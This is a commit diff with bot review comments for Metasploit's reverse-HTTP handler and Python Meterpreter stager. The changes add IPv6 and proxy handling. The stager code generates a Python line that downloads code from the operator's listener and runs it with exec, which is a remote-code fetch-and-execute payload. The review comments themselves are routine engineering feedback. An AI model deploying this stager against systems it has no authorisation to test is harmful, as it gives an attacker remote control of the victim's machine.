Adds IPv6 and option-related issues with the previous patch
parent
0601946830
commit
2ab14e7e79
|
@ -58,18 +58,12 @@ module ReverseHttp
|
|||
], Msf::Handler::ReverseHttp)
|
||||
end
|
||||
|
||||
# Toggle for IPv4 vs IPv6 mode
|
||||
#
|
||||
def ipv6?
|
||||
Rex::Socket.is_ipv6?(datastore['LHOST'])
|
||||
end
|
||||
|
||||
# Determine where to bind the server
|
||||
#
|
||||
# @return [String]
|
||||
def listener_address
|
||||
if datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||
bindaddr = (ipv6?) ? '::' : '0.0.0.0'
|
||||
if datastore['ReverseListenerBindAddress'].to_s == ""
|
||||
bindaddr = Rex::Socket.is_ipv6?(datastore['LHOST']) ? '::' : '0.0.0.0'
|
||||
else
|
||||
bindaddr = datastore['ReverseListenerBindAddress']
|
||||
end
|
||||
|
@ -77,14 +71,12 @@ module ReverseHttp
|
|||
bindaddr
|
||||
end
|
||||
|
||||
# Return a URI suitable for placing in a payload
|
||||
#
|
||||
# @return [String] A URI of the form +scheme://host:port/+
|
||||
def listener_uri
|
||||
if ipv6?
|
||||
listen_host = "[#{listener_address}]"
|
||||
else
|
||||
listen_host = listener_address
|
||||
end
|
||||
"#{scheme}://#{listen_host}:#{datastore['LPORT']}/"
|
||||
uri_host = Rex::Socket.is_ipv6?(listener_address) ? "[#{listener_address}]" : listener_address
|
||||
"#{scheme}://#{uri_host}:#{datastore['LPORT']}/"
|
||||
end
|
||||
|
||||
# Return a URI suitable for placing in a payload.
|
||||
|
@ -192,13 +184,17 @@ protected
|
|||
info[:port] = (datastore['PROXY_PORT'] || 8080).to_i
|
||||
info[:type] = datastore['PROXY_TYPE'].to_s
|
||||
|
||||
if info[:port] == 80
|
||||
info[:info] = info[:host]
|
||||
else
|
||||
info[:info] = "#{info[:host]}:#{info[:port]}"
|
||||
uri_host = info[:host]
|
||||
|
||||
if Rex::Socket.is_ipv6?(uri_host)
|
||||
uri_host = "[#{info[:host]}]"
|
||||
end
|
||||
|
||||
if info[:type] == "HTTP"
|
||||
info[:info] = "#{uri_host}:#{info[:port]}"
|
||||
|
||||
if info[:type] == "SOCKS"
|
||||
info[:info] = "socks=#{info[:info]}"
|
||||
else
|
||||
info[:info] = "http://#{info[:info]}"
|
||||
if datastore['PROXY_USERNAME'].to_s != ""
|
||||
info[:username] = datastore['PROXY_USERNAME'].to_s
|
||||
|
@ -206,8 +202,6 @@ protected
|
|||
if datastore['PROXY_PASSWORD'].to_s != ""
|
||||
info[:password] = datastore['PROXY_PASSWORD'].to_s
|
||||
end
|
||||
else
|
||||
info[:info] = "socks=#{info[:info]}"
|
||||
end
|
||||
|
||||
@proxy_settings = info
|
||||
|
@ -242,7 +236,7 @@ protected
|
|||
blob.sub!('HTTP_COMMUNICATION_TIMEOUT = 300', "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
|
||||
blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(datastore['MeterpreterUserAgent'])}'")
|
||||
|
||||
if @proxy_settings[:host] && @proxy_settings[:type] == "HTTP"
|
||||
if @proxy_settings[:host]
|
||||
blob.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(@proxy_settings[:info])}'")
|
||||
end
|
||||
|
||||
|
|
|
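Review bot: The guard in front of the `HTTP_PROXY` substitution appears to be reduced to `if @proxy_settings[:host]`, so whatever the proxy-settings hunk built is written into the script for every proxy type, including the `socks=host:port` form produced when `PROXY_TYPE` is `SOCKS`. Whether the consumer of `HTTP_PROXY` accepts that form is not visible on this page; if it expects an HTTP proxy URL, keep a type check such as `if @proxy_settings[:host] && @proxy_settings[:type] != "SOCKS"`. An empty string is also truthy in Ruby, so if `info[:host]` comes from `datastore['PROXY_HOST'].to_s` (the assignment is outside the hunk) the guard passes with no proxy configured; `unless @proxy_settings[:host].to_s.empty?` would state the intent. The type test matches only the exact string `"SOCKS"`, so any other spelling silently takes the HTTP branch, which deserves a comment. Both enclosing methods start outside the visible hunks.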
@ -28,6 +28,8 @@ module Metasploit3
|
|||
[
|
||||
OptString.new('PROXY_HOST', [false, "The proxy server's IP address"]),
|
||||
OptPort.new('PROXY_PORT', [true, "The proxy port to connect to", 8080 ]),
|
||||
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentication"]),
|
||||
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentication"])
|
||||
], Msf::Handler::ReverseHttp)
|
||||
end
|
||||
|
||||
|
@ -41,21 +43,32 @@ module Metasploit3
|
|||
txt.gsub('\\', '\\'*4).gsub('\'', %q(\\\'))
|
||||
}
|
||||
|
||||
target_url = 'http://'
|
||||
target_url << lhost
|
||||
if Rex::Socket.is_ipv6?(lhost)
|
||||
target_url = "http://[#{lhost}]"
|
||||
else
|
||||
target_url = "http://#{lhost}"
|
||||
end
|
||||
|
||||
target_url << ':'
|
||||
target_url << datastore['LPORT'].to_s
|
||||
target_url << '/'
|
||||
target_url << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP)
|
||||
|
||||
proxy_host = datastore['PROXY_HOST'].to_s
|
||||
proxy_port = datastore['PROXY_PORT'].to_i
|
||||
|
||||
cmd = "import sys\n"
|
||||
if datastore['PROXY_HOST'].to_s == ''
|
||||
if proxy_host == ''
|
||||
cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n"
|
||||
else
|
||||
proxy_url = "http://#{datastore['PROXY_HOST']}:#{datastore['PROXY_PORT']}"
|
||||
proxy_url = Rex::Socket.is_ipv6?(proxy_host) ?
|
||||
"http://[#{proxy_host}]:#{proxy_port}" :
|
||||
"http://#{proxy_host}:#{proxy_port}"
|
||||
|
||||
cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n"
|
||||
cmd << "o=ul.build_opener(ul.ProxyHandler({'http':'#{var_escape.call(proxy_url)}'}))\n"
|
||||
end
|
||||
|
||||
cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
|
||||
cmd << "exec(o.open('#{target_url}').read())\n"
|
||||
|
||||
|
|
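Review bot: `target_url` is interpolated into the generated Python source unescaped in `exec(o.open('#{target_url}').read())`, while `proxy_url` and the User-Agent in the same hunk go through `var_escape`. Since `lhost` is formatted straight into that URL here, a quote or backslash in the option value would terminate the string literal and change the generated code; pass it through the same escaper, `cmd << "exec(o.open('#{var_escape.call(target_url)}').read())\n"`. The bracket-if-IPv6 formatting is also written out separately for `lhost` and `proxy_host`, and again in the handler, so a single small helper would keep the copies from drifting apart. The enclosing method starts and ends outside the hunk.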